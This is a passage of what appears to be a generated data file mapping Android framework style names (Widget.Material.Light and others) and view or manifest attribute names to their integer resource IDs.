'Widget.Material.Light' : 16974478,
'Widget.Material.Light.ActionBar' : 16974479,
'Widget.Material.Light.ActionBar.Solid' : 16974480,
'Widget.Material.Light.ActionBar.TabBar' : 16974481,
'Widget.Material.Light.ActionBar.TabText' : 16974482,
'Widget.Material.Light.ActionBar.TabView' : 16974483,
'Widget.Material.Light.ActionButton' : 16974484,
'Widget.Material.Light.ActionButton.CloseMode' : 16974485,
'Widget.Material.Light.ActionButton.Overflow' : 16974486,
'Widget.Material.Light.ActionMode' : 16974487,
'Widget.Material.Light.AutoCompleteTextView' : 16974488,
'Widget.Material.Light.Button' : 16974489,
'Widget.Material.Light.ButtonBar' : 16974496,
'Widget.Material.Light.ButtonBar.AlertDialog' : 16974497,
'Widget.Material.Light.Button.Borderless' : 16974490,
'Widget.Material.Light.Button.Borderless.Colored' : 16974491,
'Widget.Material.Light.Button.Borderless.Small' : 16974492,
'Widget.Material.Light.Button.Inset' : 16974493,
'Widget.Material.Light.Button.Small' : 16974494,
'Widget.Material.Light.Button.Toggle' : 16974495,
'Widget.Material.Light.CalendarView' : 16974498,
'Widget.Material.Light.CheckedTextView' : 16974499,
'Widget.Material.Light.CompoundButton.CheckBox' : 16974500,
'Widget.Material.Light.CompoundButton.RadioButton' : 16974501,
'Widget.Material.Light.CompoundButton.Star' : 16974502,
'Widget.Material.Light.DatePicker' : 16974503,
'Widget.Material.Light.DropDownItem' : 16974504,
'Widget.Material.Light.DropDownItem.Spinner' : 16974505,
'Widget.Material.Light.EditText' : 16974506,
'Widget.Material.Light.ExpandableListView' : 16974507,
'Widget.Material.Light.FastScroll' : 16974508,
'Widget.Material.Light.GridView' : 16974509,
'Widget.Material.Light.HorizontalScrollView' : 16974510,
'Widget.Material.Light.ImageButton' : 16974511,
'Widget.Material.Light.ListPopupWindow' : 16974512,
'Widget.Material.Light.ListView' : 16974513,
'Widget.Material.Light.ListView.DropDown' : 16974514,
'Widget.Material.Light.MediaRouteButton' : 16974515,
'Widget.Material.Light.PopupMenu' : 16974516,
'Widget.Material.Light.PopupMenu.Overflow' : 16974517,
'Widget.Material.Light.PopupWindow' : 16974518,
'Widget.Material.Light.ProgressBar' : 16974519,
'Widget.Material.Light.ProgressBar.Horizontal' : 16974520,
'Widget.Material.Light.ProgressBar.Inverse' : 16974521,
'Widget.Material.Light.ProgressBar.Large' : 16974522,
'Widget.Material.Light.ProgressBar.Large.Inverse' : 16974523,
'Widget.Material.Light.ProgressBar.Small' : 16974524,
'Widget.Material.Light.ProgressBar.Small.Inverse' : 16974525,
'Widget.Material.Light.ProgressBar.Small.Title' : 16974526,
'Widget.Material.Light.RatingBar' : 16974527,
'Widget.Material.Light.RatingBar.Indicator' : 16974528,
'Widget.Material.Light.RatingBar.Small' : 16974529,
'Widget.Material.Light.ScrollView' : 16974530,
'Widget.Material.Light.SearchView' : 16974531,
'Widget.Material.Light.SeekBar' : 16974532,
'Widget.Material.Light.SegmentedButton' : 16974533,
'Widget.Material.Light.Spinner' : 16974535,
'Widget.Material.Light.Spinner.Underlined' : 16974536,
'Widget.Material.Light.StackView' : 16974534,
'Widget.Material.Light.Tab' : 16974537,
'Widget.Material.Light.TabWidget' : 16974538,
'Widget.Material.Light.TextView' : 16974539,
'Widget.Material.Light.TextView.SpinnerItem' : 16974540,
'Widget.Material.Light.TimePicker' : 16974541,
'Widget.Material.Light.WebTextView' : 16974542,
'Widget.Material.Light.WebView' : 16974543,
'Widget.Material.ListPopupWindow' : 16974447,
'Widget.Material.ListView' : 16974448,
'Widget.Material.ListView.DropDown' : 16974449,
'Widget.Material.MediaRouteButton' : 16974450,
'Widget.Material.PopupMenu' : 16974451,
'Widget.Material.PopupMenu.Overflow' : 16974452,
'Widget.Material.PopupWindow' : 16974453,
'Widget.Material.ProgressBar' : 16974454,
'Widget.Material.ProgressBar.Horizontal' : 16974455,
'Widget.Material.ProgressBar.Large' : 16974456,
'Widget.Material.ProgressBar.Small' : 16974457,
'Widget.Material.ProgressBar.Small.Title' : 16974458,
'Widget.Material.RatingBar' : 16974459,
'Widget.Material.RatingBar.Indicator' : 16974460,
'Widget.Material.RatingBar.Small' : 16974461,
'Widget.Material.ScrollView' : 16974462,
'Widget.Material.SearchView' : 16974463,
'Widget.Material.SeekBar' : 16974464,
'Widget.Material.SegmentedButton' : 16974465,
'Widget.Material.Spinner' : 16974467,
'Widget.Material.Spinner.Underlined' : 16974468,
'Widget.Material.StackView' : 16974466,
'Widget.Material.Tab' : 16974469,
'Widget.Material.TabWidget' : 16974470,
'Widget.Material.TextView' : 16974471,
'Widget.Material.TextView.SpinnerItem' : 16974472,
'Widget.Material.TimePicker' : 16974473,
'Widget.Material.Toolbar' : 16974474,
'Widget.Material.Toolbar.Button.Navigation' : 16974475,
'Widget.Material.WebTextView' : 16974476,
'Widget.Material.WebView' : 16974477,
'Widget.PopupMenu' : 16973958,
'Widget.PopupWindow' : 16973878,
'Widget.ProgressBar' : 16973852,
'Widget.ProgressBar.Horizontal' : 16973855,
'Widget.ProgressBar.Inverse' : 16973915,
'Widget.ProgressBar.Large' : 16973853,
'Widget.ProgressBar.Large.Inverse' : 16973916,
'Widget.ProgressBar.Small' : 16973854,
'Widget.ProgressBar.Small.Inverse' : 16973917,
'Widget.RatingBar' : 16973857,
'Widget.ScrollView' : 16973869,
'Widget.SeekBar' : 16973856,
'Widget.Spinner' : 16973864,
'Widget.Spinner.DropDown' : 16973955,
'Widget.StackView' : 16974310,
'Widget.TabWidget' : 16973876,
'Widget.TextView' : 16973858,
'Widget.TextView.PopupMenu' : 16973865,
'Widget.TextView.SpinnerItem' : 16973866,
'Widget.Toolbar' : 16974311,
'Widget.Toolbar.Button.Navigation' : 16974312,
'Widget.WebView' : 16973875,
},
'attr': {
'theme' : 16842752,
'label' : 16842753,
'icon' : 16842754,
'name' : 16842755,
'manageSpaceActivity' : 16842756,
'allowClearUserData' : 16842757,
'permission' : 16842758,
'readPermission' : 16842759,
'writePermission' : 16842760,
'protectionLevel' : 16842761,
'permissionGroup' : 16842762,
'sharedUserId' : 16842763,
'hasCode' : 16842764,
'persistent' : 16842765,
'enabled' : 16842766,
'debuggable' : 16842767,
'exported' : 16842768,
'process' : 16842769,
'taskAffinity' : 16842770,
'multiprocess' : 16842771,
'finishOnTaskLaunch' : 16842772,
'clearTaskOnLaunch' : 16842773,
'stateNotNeeded' : 16842774,
'excludeFromRecents' : 16842775,
'authorities' : 16842776,
'syncable' : 16842777,
'initOrder' : 16842778,
'grantUriPermissions' : 16842779,
'priority' : 16842780,
'launchMode' : 16842781,
'screenOrientation' : 16842782,
'configChanges' : 16842783,
'description' : 16842784,
'targetPackage' : 16842785,
'handleProfiling' : 16842786,
'functionalTest' : 16842787,
'value' : 16842788,
'resource' : 16842789,
'mimeType' : 16842790,
'scheme' : 16842791,
'host' : 16842792,
'port' : 16842793,
'path' : 16842794,
'pathPrefix' : 16842795,
'pathPattern' : 16842796,
'action' : 16842797,
'data' : 16842798,
'targetClass' : 16842799,
'colorForeground' : 16842800,
'colorBackground' : 16842801,
'backgroundDimAmount' : 16842802,
'disabledAlpha' : 16842803,
'textAppearance' : 16842804,
'textAppearanceInverse' : 16842805,
'textColorPrimary' : 16842806,
'textColorPrimaryDisableOnly' : 16842807,
'textColorSecondary' : 16842808,
'textColorPrimaryInverse' : 16842809,
'textColorSecondaryInverse' : 16842810,
'textColorPrimaryNoDisable' : 16842811,
'textColorSecondaryNoDisable' : 16842812,
'textColorPrimaryInverseNoDisable' : 16842813,
'textColorSecondaryInverseNoDisable' : 16842814,
'textColorHintInverse' : 16842815,
'textAppearanceLarge' : 16842816,
'textAppearanceMedium' : 16842817,
'textAppearanceSmall' : 16842818,
'textAppearanceLargeInverse' : 16842819,
'textAppearanceMediumInverse' : 16842820,
'textAppearanceSmallInverse' : 16842821,
'textCheckMark' : 16842822,
'textCheckMarkInverse' : 16842823,
'buttonStyle' : 16842824,
'buttonStyleSmall' : 16842825,
'buttonStyleInset' : 16842826,
'buttonStyleToggle' : 16842827,
'galleryItemBackground' : 16842828,
'listPreferredItemHeight' : 16842829,
'expandableListPreferredItemPaddingLeft' : 16842830,
'expandableListPreferredChildPaddingLeft' : 16842831,
'expandableListPreferredItemIndicatorLeft' : 16842832,
'expandableListPreferredItemIndicatorRight' : 16842833,
'expandableListPreferredChildIndicatorLeft' : 16842834,
'expandableListPreferredChildIndicatorRight' : 16842835,
'windowBackground' : 16842836,
'windowFrame' : 16842837,
'windowNoTitle' : 16842838,
'windowIsFloating' : 16842839,
'windowIsTranslucent' : 16842840,
'windowContentOverlay' : 16842841,
'windowTitleSize' : 16842842,
'windowTitleStyle' : 16842843,
'windowTitleBackgroundStyle' : 16842844,
'alertDialogStyle' : 16842845,
'panelBackground' : 16842846,
'panelFullBackground' : 16842847,
'panelColorForeground' : 16842848,
'panelColorBackground' : 16842849,
'panelTextAppearance' : 16842850,
'scrollbarSize' : 16842851,
'scrollbarThumbHorizontal' : 16842852,
'scrollbarThumbVertical' : 16842853,
'scrollbarTrackHorizontal' : 16842854,
'scrollbarTrackVertical' : 16842855,
'scrollbarAlwaysDrawHorizontalTrack' : 16842856,
'scrollbarAlwaysDrawVerticalTrack' : 16842857,
'absListViewStyle' : 16842858,
'autoCompleteTextViewStyle' : 16842859,
'checkboxStyle' : 16842860,
'dropDownListViewStyle' : 16842861,
'editTextStyle' : 16842862,
'expandableListViewStyle' : 16842863,
'galleryStyle' : 16842864,
'gridViewStyle' : 16842865,
'imageButtonStyle' : 16842866,
'imageWellStyle' : 16842867,
'listViewStyle' : 16842868,
'listViewWhiteStyle' : 16842869,
'popupWindowStyle' : 16842870,
'progressBarStyle' : 16842871,
'progressBarStyleHorizontal' : 16842872,
'progressBarStyleSmall' : 16842873,
'progressBarStyleLarge' : 16842874,
'seekBarStyle' : 16842875,
'ratingBarStyle' : 16842876,
'ratingBarStyleSmall' : 16842877,
'radioButtonStyle' : 16842878,
'scrollbarStyle' : 16842879,
'scrollViewStyle' : 16842880,
'spinnerStyle' : 16842881,
'starStyle' : 16842882,
'tabWidgetStyle' : 16842883,
'textViewStyle' : 16842884,
'webViewStyle' : 16842885,
'dropDownItemStyle' : 16842886,
'spinnerDropDownItemStyle' : 16842887,
'dropDownHintAppearance' : 16842888,
'spinnerItemStyle' : 16842889,
'mapViewStyle' : 16842890,
'preferenceScreenStyle' : 16842891,
'preferenceCategoryStyle' : 16842892,
'preferenceInformationStyle' : 16842893,
'preferenceStyle' : 16842894,
'checkBoxPreferenceStyle' : 16842895,
'yesNoPreferenceStyle' : 16842896,
'dialogPreferenceStyle' : 16842897,
'editTextPreferenceStyle' : 16842898,
'ringtonePreferenceStyle' : 16842899,
'preferenceLayoutChild' : 16842900,
'textSize' : 16842901,
'typeface' : 16842902,
'textStyle' : 16842903,
'textColor' : 16842904,
'textColorHighlight' : 16842905,
'textColorHint' : 16842906,
'textColorLink' : 16842907,
'state_focused' : 16842908,
'state_window_focused' : 16842909,
'state_enabled' : 16842910,
'state_checkable' : 16842911,
'state_checked' : 16842912,
'state_selected' : 16842913,
'state_active' : 16842914,
'state_single' : 16842915,
'state_first' : 16842916,
'state_middle' : 16842917,
'state_last' : 16842918,
'state_pressed' : 16842919,
'state_expanded' : 16842920,
'state_empty' : 16842921,
'state_above_anchor' : 16842922,
'ellipsize' : 16842923,
'x' : 16842924,
'y' : 16842925,
'windowAnimationStyle' : 16842926,
'gravity' : 16842927,
'autoLink' : 16842928,
'linksClickable' : 16842929,
'entries' : 16842930,
'layout_gravity' : 16842931,
'windowEnterAnimation' : 16842932,
'windowExitAnimation' : 16842933,
'windowShowAnimation' : 16842934,
'windowHideAnimation' : 16842935,
'activityOpenEnterAnimation' : 16842936,
'activityOpenExitAnimation' : 16842937,
'activityCloseEnterAnimation' : 16842938,
'activityCloseExitAnimation' : 16842939,
'taskOpenEnterAnimation' : 16842940,
'taskOpenExitAnimation' : 16842941,
'taskCloseEnterAnimation' : 16842942,
'taskCloseExitAnimation' : 16842943,
'taskToFrontEnterAnimation' : 16842944,
'taskToFrontExitAnimation' : 16842945,
'taskToBackEnterAnimation' : 16842946,
'taskToBackExitAnimation' : 16842947,
'orientation' : 16842948,
'keycode' : 16842949,
'fullDark' : 16842950,
'topDark' : 16842951,
'centerDark' : 16842952,
'bottomDark' : 16842953,
'fullBright' : 16842954,
'topBright' : 16842955,
'centerBright' : 16842956,
'bottomBright' : 16842957,
'bottomMedium' : 16842958,
'centerMedium' : 16842959,
'id' : 16842960,
'tag' : 16842961,
'scrollX' : 16842962,
'scrollY' : 16842963,
'background' : 16842964,
'padding' : 16842965,
'paddingLeft' : 16842966,
'paddingTop' : 16842967,
'paddingRight' : 16842968,
'paddingBottom' : 16842969,
'focusable' : 16842970,
'focusableInTouchMode' : 16842971,
'visibility' : 16842972,
'fitsSystemWindows' : 16842973,
'scrollbars' : 16842974,
'fadingEdge' : 16842975,
'fadingEdgeLength' : 16842976,
'nextFocusLeft' : 16842977,
'nextFocusRight' : 16842978,
'nextFocusUp' : 16842979,
'nextFocusDown' : 16842980,
'clickable' : 16842981,
'longClickable' : 16842982,
'saveEnabled' : 16842983,
'drawingCacheQuality' : 16842984,
'duplicateParentState' : 16842985,
'clipChildren' : 16842986,
'clipToPadding' : 16842987,
'layoutAnimation' : 16842988,
'animationCache' : 16842989,
'persistentDrawingCache' : 16842990,
'alwaysDrawnWithCache' : 16842991,
'addStatesFromChildren' : 16842992,
'descendantFocusability' : 16842993,
'layout' : 16842994,
'inflatedId' : 16842995,
'layout_width' : 16842996,
'layout_height' : 16842997,
'layout_margin' : 16842998,
'layout_marginLeft' : 16842999,
'layout_marginTop' : 16843000,
'layout_marginRight' : 16843001,
'layout_marginBottom' : 16843002,
'listSelector' : 16843003,
'drawSelectorOnTop' : 16843004,
'stackFromBottom' : 16843005,
'scrollingCache' : 16843006,
'textFilterEnabled' : 16843007,
'transcriptMode' : 16843008,
'cacheColorHint' : 16843009,
'dial' : 16843010,
'hand_hour' : 16843011,
'hand_minute' : 16843012,
'format' : 16843013,
'checked' : 16843014,
'button' : 16843015,
'checkMark' : 16843016,
'foreground' : 16843017,
'measureAllChildren' : 16843018,
'groupIndicator' : 16843019,
'childIndicator' : 16843020,
'indicatorLeft' : 16843021,
'indicatorRight' : 16843022,
'childIndicatorLeft' : 16843023,
'childIndicatorRight' : 16843024,
'childDivider' : 16843025,
'animationDuration' : 16843026,
'spacing' : 16843027,
'horizontalSpacing' : 16843028,
'verticalSpacing' : 16843029,
'stretchMode' : 16843030,
'columnWidth' : 16843031,
'numColumns' : 16843032,
'src' : 16843033,
'antialias' : 16843034,
'filter' : 16843035,
'dither' : 16843036,
'scaleType' : 16843037,
'adjustViewBounds' : 16843038,
'maxWidth' : 16843039,
'maxHeight' : 16843040,
'tint' : 16843041,
'baselineAlignBottom' : 16843042,
'cropToPadding' : 16843043,
'textOn' : 16843044,
'textOff' : 16843045,
'baselineAligned' : 16843046,
'baselineAlignedChildIndex' : 16843047,
'weightSum' : 16843048,
'divider' : 16843049,
'dividerHeight' : 16843050,
'choiceMode' : 16843051,
'itemTextAppearance' : 16843052,
'horizontalDivider' : 16843053,
'verticalDivider' : 16843054,
'headerBackground' : 16843055,
'itemBackground' : 16843056,
'itemIconDisabledAlpha' : 16843057,
'rowHeight' : 16843058,
'maxRows' : 16843059,
'maxItemsPerRow' : 16843060,
'moreIcon' : 16843061,
'max' : 16843062,
'progress' : 16843063,
'secondaryProgress' : 16843064,
'indeterminate' : 16843065,
'indeterminateOnly' : 16843066,
'indeterminateDrawable' : 16843067,
'progressDrawable' : 16843068,
'indeterminateDuration' : 16843069,
'indeterminateBehavior' : 16843070,
'minWidth' : 16843071,
'minHeight' : 16843072,
'interpolator' : 16843073,
'thumb' : 16843074,
'thumbOffset' : 16843075,
'numStars' : 16843076,
'rating' : 16843077,
'stepSize' : 16843078,
'isIndicator' : 16843079,
'checkedButton' : 16843080,
'stretchColumns' : 16843081,
'shrinkColumns' : 16843082,
'collapseColumns' : 16843083,
'layout_column' : 16843084,
'layout_span' : 16843085,
'bufferType' : 16843086,
'text' : 16843087,
'hint' : 16843088,
'textScaleX' : 16843089,
'cursorVisible' : 16843090,
'maxLines' : 16843091,
'lines' : 16843092,
'height' : 16843093,
'minLines' : 16843094,
'maxEms' : 16843095,
'ems' : 16843096,
'width' : 16843097,
'minEms' : 16843098,
'scrollHorizontally' : 16843099,
'password' : 16843100,
'singleLine' : 16843101,
'selectAllOnFocus' : 16843102,
'includeFontPadding' : 16843103,
'maxLength' : 16843104,
'shadowColor' : 16843105,
'shadowDx' : 16843106,
'shadowDy' : 16843107,
'shadowRadius' : 16843108,
'numeric' : 16843109,
'digits' : 16843110,
'phoneNumber' : 16843111,
'inputMethod' : 16843112,
'capitalize' : 16843113,
'autoText' : 16843114,
'editable' : 16843115,
'freezesText' : 16843116,
'drawableTop' : 16843117,
'drawableBottom' : 16843118,
'drawableLeft' : 16843119,
'drawableRight' : 16843120,
'drawablePadding' : 16843121,
'completionHint' : 16843122,
'completionHintView' : 16843123,
'completionThreshold' : 16843124,
'dropDownSelector' : 16843125,
'popupBackground' : 16843126,
'inAnimation' : 16843127,
'outAnimation' : 16843128,
'flipInterval' : 16843129,
'fillViewport' : 16843130,
'prompt' : 16843131,
'startYear' : 16843132,
'endYear' : 16843133,
'mode' : 16843134,
'layout_x' : 16843135,
'layout_y' : 16843136,
'layout_weight' : 16843137,
'layout_toLeftOf' : 16843138,
'layout_toRightOf' : 16843139,
'layout_above' : 16843140,
'layout_below' : 16843141,
'layout_alignBaseline' : 16843142,
'layout_alignLeft' : 16843143,
'layout_alignTop' : 16843144,
'layout_alignRight' : 16843145,
'layout_alignBottom' : 16843146,
'layout_alignParentLeft' : 16843147,
'layout_alignParentTop' : 16843148,
'layout_alignParentRight' : 16843149,
'layout_alignParentBottom' : 16843150,
'layout_centerInParent' : 16843151,
'layout_centerHorizontal' : 16843152,
'layout_centerVertical' : 16843153,
'layout_alignWithParentIfMissing' : 16843154,
'layout_scale' : 16843155,
'visible' : 16843156,
'variablePadding' : 16843157,
'constantSize' : 16843158,
'oneshot' : 16843159,
'duration' : 16843160,
'drawable' : 16843161,
'shape' : 16843162,
'innerRadiusRatio' : 16843163,
'thicknessRatio' : 16843164,
'startColor' : 16843165,
'endColor' : 16843166,
'useLevel' : 16843167,
'angle' : 16843168,
'type' : 16843169,
'centerX' : 16843170,
'centerY' : 16843171,
'gradientRadius' : 16843172,
'color' : 16843173,
'dashWidth' : 16843174,
'dashGap' : 16843175,
'radius' : 16843176,
'topLeftRadius' : 16843177,
'topRightRadius' : 16843178,
'bottomLeftRadius' : 16843179,
'bottomRightRadius' : 16843180,
'left' : 16843181,
'top' : 16843182,
'right' : 16843183,
'bottom' : 16843184,
'minLevel' : 16843185,
'maxLevel' : 16843186,
'fromDegrees' : 16843187,
'toDegrees' : 16843188,
'pivotX' : 16843189,
'pivotY' : 16843190,
'insetLeft' : 16843191,
'insetRight' : 16843192,
'insetTop' : 16843193,
'insetBottom' : 16843194,
'shareInterpolator' : 16843195,
'fillBefore' : 16843196,
'fillAfter' : 16843197,
'startOffset' : 16843198,
'repeatCount' : 16843199,
'repeatMode' : 16843200,
'zAdjustment' : 16843201,
'fromXScale' : 16843202,
'toXScale' : 16843203,
'fromYScale' : 16843204,
'toYScale' : 16843205,
'fromXDelta' : 16843206,
'toXDelta' : 16843207,
'fromYDelta' : 16843208,
'toYDelta' : 16843209,
'fromAlpha' : 16843210,
'toAlpha' : 16843211,
'delay' : 16843212,
'animation' : 16843213,
'animationOrder' : 16843214,
'columnDelay' : 16843215,
'rowDelay' : 16843216,
'direction' : 16843217,
'directionPriority' : 16843218,
'factor' : 16843219,
'cycles' : 16843220,
'searchMode' : 16843221,
'searchSuggestAuthority' : 16843222,
'searchSuggestPath' : 16843223,
'searchSuggestSelection' : 16843224,
'searchSuggestIntentAction' : 16843225,
'searchSuggestIntentData' : 16843226,
'queryActionMsg' : 16843227,
'suggestActionMsg' : 16843228,
'suggestActionMsgColumn' : 16843229,
'menuCategory' : 16843230,
'orderInCategory' : 16843231,
'checkableBehavior' : 16843232,
'title' : 16843233,
'titleCondensed' : 16843234,
'alphabeticShortcut' : 16843235,
'numericShortcut' : 16843236,
'checkable' : 16843237,
'selectable' : 16843238,
'orderingFromXml' : 16843239,
'key' : 16843240,
'summary' : 16843241,
'order' : 16843242,
'widgetLayout' : 16843243,
'dependency' : 16843244,
'defaultValue' : 16843245,
'shouldDisableView' : 16843246,
'summaryOn' : 16843247,
'summaryOff' : 16843248,
'disableDependentsState' : 16843249,
'dialogTitle' : 16843250,
'dialogMessage' : 16843251,
'dialogIcon' : 16843252,
'positiveButtonText' : 16843253,
'negativeButtonText' : 16843254,
'dialogLayout' : 16843255,
'entryValues' : 16843256,
'ringtoneType' : 16843257,
'showDefault' : 16843258,
'showSilent' : 16843259,
'scaleWidth' : 16843260,
'scaleHeight' : 16843261,
'scaleGravity' : 16843262,
'ignoreGravity' : 16843263,
'foregroundGravity' : 16843264,
'tileMode' : 16843265,
'targetActivity' : 16843266,
'alwaysRetainTaskState' : 16843267,
'allowTaskReparenting' : 16843268,
'searchButtonText' : 16843269,
'colorForegroundInverse' : 16843270,
'textAppearanceButton' : 16843271,
'listSeparatorTextViewStyle' : 16843272,
'streamType' : 16843273,
'clipOrientation' : 16843274,
'centerColor' : 16843275,
'minSdkVersion' : 16843276,
'windowFullscreen' : 16843277,
'unselectedAlpha' : 16843278,
'progressBarStyleSmallTitle' : 16843279,
'ratingBarStyleIndicator' : 16843280,
'apiKey' : 16843281,
'textColorTertiary' : 16843282,
'textColorTertiaryInverse' : 16843283,
'listDivider' : 16843284,
'soundEffectsEnabled' : 16843285,
'keepScreenOn' : 16843286,
'lineSpacingExtra' : 16843287,
'lineSpacingMultiplier' : 16843288,
'listChoiceIndicatorSingle' : 16843289,
'listChoiceIndicatorMultiple' : 16843290,
'versionCode' : 16843291,
'versionName' : 16843292,
'marqueeRepeatLimit' : 16843293,
'windowNoDisplay' : 16843294,
'backgroundDimEnabled' : 16843295,
'inputType' : 16843296,
'isDefault' : 16843297,
'windowDisablePreview' : 16843298,
'privateImeOptions' : 16843299,
'editorExtras' : 16843300,
'settingsActivity' : 16843301,
'fastScrollEnabled' : 16843302,
'reqTouchScreen' : 16843303,
'reqKeyboardType' : 16843304,
'reqHardKeyboard' : 16843305,
'reqNavigation' : 16843306,
'windowSoftInputMode' : 16843307,
'imeFullscreenBackground' : 16843308,
'noHistory' : 16843309,
'headerDividersEnabled' : 16843310,
'footerDividersEnabled' : 16843311,
'candidatesTextStyleSpans' : 16843312,
'smoothScrollbar' : 16843313,
'reqFiveWayNav' : 16843314,
'keyBackground' : 16843315,
'keyTextSize' : 16843316,
'labelTextSize' : 16843317,
'keyTextColor' : 16843318,
'keyPreviewLayout' : 16843319,
'keyPreviewOffset' : 16843320,
'keyPreviewHeight' : 16843321,
'verticalCorrection' : 16843322,
'popupLayout' : 16843323,
'state_long_pressable' : 16843324,
'keyWidth' : 16843325,
'keyHeight' : 16843326,
'horizontalGap' : 16843327,
'verticalGap' : 16843328,
'rowEdgeFlags' : 16843329,
'codes' : 16843330,
'popupKeyboard' : 16843331,
'popupCharacters' : 16843332,
'keyEdgeFlags' : 16843333,
'isModifier' : 16843334,
'isSticky' : 16843335,
'isRepeatable' : 16843336,
'iconPreview' : 16843337,
'keyOutputText' : 16843338,
'keyLabel' : 16843339,
'keyIcon' : 16843340,
'keyboardMode' : 16843341,
'isScrollContainer' : 16843342,
'fillEnabled' : 16843343,
'updatePeriodMillis' : 16843344,
'initialLayout' : 16843345,
'voiceSearchMode' : 16843346,
'voiceLanguageModel' : 16843347,
'voicePromptText' : 16843348,
'voiceLanguage' : 16843349,
'voiceMaxResults' : 16843350,
'bottomOffset' : 16843351,
'topOffset' : 16843352,
'allowSingleTap' : 16843353,
'handle' : 16843354,
'content' : 16843355,
'animateOnClick' : 16843356,
'configure' : 16843357,
'hapticFeedbackEnabled' : 16843358,
'innerRadius' : 16843359,
'thickness' : 16843360,
'sharedUserLabel' : 16843361,
'dropDownWidth' : 16843362,
'dropDownAnchor' : 16843363,
'imeOptions' : 16843364,
'imeActionLabel' : 16843365,
'imeActionId' : 16843366,
'imeExtractEnterAnimation' : 16843368,
'imeExtractExitAnimation' : 16843369,
'tension' : 16843370,
'extraTension' : 16843371,
'anyDensity' : 16843372,
'searchSuggestThreshold' : 16843373,
'includeInGlobalSearch' : 16843374,
'onClick' : 16843375,
'targetSdkVersion' : 16843376,
'maxSdkVersion' : 16843377,
'testOnly' : 16843378,
'contentDescription' : 16843379,
'gestureStrokeWidth' : 16843380,
'gestureColor' : 16843381,
'uncertainGestureColor' : 16843382,
'fadeOffset' : 16843383,
'fadeDuration' : 16843384,
'gestureStrokeType' : 16843385,
'gestureStrokeLengthThreshold' : 16843386,
'gestureStrokeSquarenessThreshold' : 16843387,
'gestureStrokeAngleThreshold' : 16843388,
'eventsInterceptionEnabled' : 16843389,
'fadeEnabled' : 16843390,
'backupAgent' : 16843391,
'allowBackup' : 16843392,
'glEsVersion' : 16843393,
'queryAfterZeroResults' : 16843394,
'dropDownHeight' : 16843395,
'smallScreens' : 16843396,
'normalScreens' : 16843397,
'largeScreens' : 16843398,
'progressBarStyleInverse' : 16843399,
'progressBarStyleSmallInverse' : 16843400,
'progressBarStyleLargeInverse' : 16843401,
'searchSettingsDescription' : 16843402,
'textColorPrimaryInverseDisableOnly' : 16843403,
'autoUrlDetect' : 16843404,
'resizeable' : 16843405,
'required' : 16843406,
'accountType' : 16843407,
'contentAuthority' : 16843408,
'userVisible' : 16843409,
'windowShowWallpaper' : 16843410,
'wallpaperOpenEnterAnimation' : 16843411,
'wallpaperOpenExitAnimation' : 16843412,
'wallpaperCloseEnterAnimation' : 16843413,
'wallpaperCloseExitAnimation' : 16843414,
'wallpaperIntraOpenEnterAnimation' : 16843415,
'wallpaperIntraOpenExitAnimation' : 16843416,
'wallpaperIntraCloseEnterAnimation' : 16843417,
'wallpaperIntraCloseExitAnimation' : 16843418,
'supportsUploading' : 16843419,
'killAfterRestore' : 16843420,
'restoreNeedsApplication' : 16843421,
'smallIcon' : 16843422,
'accountPreferences' : 16843423,
'textAppearanceSearchResultSubtitle' : 16843424,
'textAppearanceSearchResultTitle' : 16843425,
'summaryColumn' : 16843426,
'detailColumn' : 16843427,
'detailSocialSummary' : 16843428,
'thumbnail' : 16843429,
'detachWallpaper' : 16843430,
'finishOnCloseSystemDialogs' : 16843431,
'scrollbarFadeDuration' : 16843432,
'scrollbarDefaultDelayBeforeFade' : 16843433,
'fadeScrollbars' : 16843434,
'colorBackgroundCacheHint' : 16843435,
'dropDownHorizontalOffset' : 16843436,
'dropDownVerticalOffset' : 16843437,
'quickContactBadgeStyleWindowSmall' : 16843438,
'quickContactBadgeStyleWindowMedium' : 16843439,
'quickContactBadgeStyleWindowLarge' : 16843440,
'quickContactBadgeStyleSmallWindowSmall' : 16843441,
'quickContactBadgeStyleSmallWindowMedium' : 16843442,
'quickContactBadgeStyleSmallWindowLarge' : 16843443,
'author' : 16843444,
'autoStart' : 16843445,
'expandableListViewWhiteStyle' : 16843446,
'installLocation' : 16843447,
'vmSafeMode' : 16843448,
'webTextViewStyle' : 16843449,
'restoreAnyVersion' : 16843450,
'tabStripLeft' : 16843451,
'tabStripRight' : 16843452,
'tabStripEnabled' : 16843453,
'logo' : 16843454,
'xlargeScreens' : 16843455,
'immersive' : 16843456,
'overScrollMode' : 16843457,
'overScrollHeader' : 16843458,
'overScrollFooter' : 16843459,
'filterTouchesWhenObscured' : 16843460,
'textSelectHandleLeft' : 16843461,
'textSelectHandleRight' : 16843462,
'textSelectHandle' : 16843463,
'textSelectHandleWindowStyle' : 16843464,
'popupAnimationStyle' : 16843465,
'screenSize' : 16843466,
'screenDensity' : 16843467,
'allContactsName' : 16843468,
'windowActionBar' : 16843469,
'actionBarStyle' : 16843470,
'navigationMode' : 16843471,
'displayOptions' : 16843472,
'subtitle' : 16843473,
'customNavigationLayout' : 16843474,
'hardwareAccelerated' : 16843475,
'measureWithLargestChild' : 16843476,
'animateFirstView' : 16843477,
'dropDownSpinnerStyle' : 16843478,
'actionDropDownStyle' : 16843479,
'actionButtonStyle' : 16843480,
'showAsAction' : 16843481,
'previewImage' : 16843482,
'actionModeBackground' : 16843483,
'actionModeCloseDrawable' : 16843484,
'windowActionModeOverlay' : 16843485,
'valueFrom' : 16843486,
'valueTo' : 16843487,
'valueType' : 16843488,
'propertyName' : 16843489,
'ordering' : 16843490,
'fragment' : 16843491,
'windowActionBarOverlay' : 16843492,
'fragmentOpenEnterAnimation' : 16843493,
'fragmentOpenExitAnimation' : 16843494,
'fragmentCloseEnterAnimation' : 16843495,
'fragmentCloseExitAnimation' : 16843496,
'fragmentFadeEnterAnimation' : 16843497,
'fragmentFadeExitAnimation' : 16843498,
'actionBarSize' : 16843499,
'imeSubtypeLocale' : 16843500,
'imeSubtypeMode' : 16843501,
'imeSubtypeExtraValue' : 16843502,
'splitMotionEvents' : 16843503,
'listChoiceBackgroundIndicator' : 16843504,
'spinnerMode' : 16843505,
'animateLayoutChanges' : 16843506,
'actionBarTabStyle' : 16843507,
'actionBarTabBarStyle' : 16843508,
'actionBarTabTextStyle' : 16843509,
'actionOverflowButtonStyle' : 16843510,
'actionModeCloseButtonStyle' : 16843511,
'titleTextStyle' : 16843512,
'subtitleTextStyle' : 16843513,
'iconifiedByDefault' : 16843514,
'actionLayout' : 16843515,
'actionViewClass' : 16843516,
'activatedBackgroundIndicator' : 16843517,
'state_activated' : 16843518,
'listPopupWindowStyle' : 16843519,
